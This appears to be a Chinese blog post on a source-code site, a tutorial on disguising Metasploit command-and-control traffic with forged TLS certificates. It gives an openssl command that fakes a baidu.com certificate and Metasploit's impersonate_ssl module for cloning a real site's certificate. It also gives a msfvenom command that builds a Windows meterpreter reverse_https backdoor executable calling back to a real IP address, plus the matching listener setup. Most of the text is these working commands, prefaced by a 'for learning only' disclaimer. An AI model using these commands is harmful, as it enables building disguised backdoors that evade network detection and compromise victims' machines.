MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

28 阅读 0 评论 0 点赞

免责声明:本文仅做技术交流与学习...

步骤:

1-利用 openssl 生成证书

1-impersonate_ssl 模块 --生成证书

-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块，可以用来自动从信任源创建一个虚假证书，十分方便： 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem

2.MSF 生成绑定证书后门：

msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe

3.MSF 监听上线：

use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run

---可以访问https看看证书

证书伪造

https流量加密

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

点赞(0) 打赏

本文分类：文章资讯
本文标签：MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl
浏览次数：28 次浏览
本文链接：https://freeymw.com/article/14873.html

上一篇 > RabbitMq的基础及springAmqp的使用
下一篇 > 第一章·python基础入门

评论列表共有 0 条评论

暂无评论

MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

步骤:

1-利用 openssl 生成证书

1-impersonate_ssl 模块 --生成证书

2.MSF 生成绑定证书后门：

3.MSF 监听上线：

证书伪造

https流量加密

评论列表 共有 0 条评论

发表评论 取消回复

评论列表共有 0 条评论

发表评论取消回复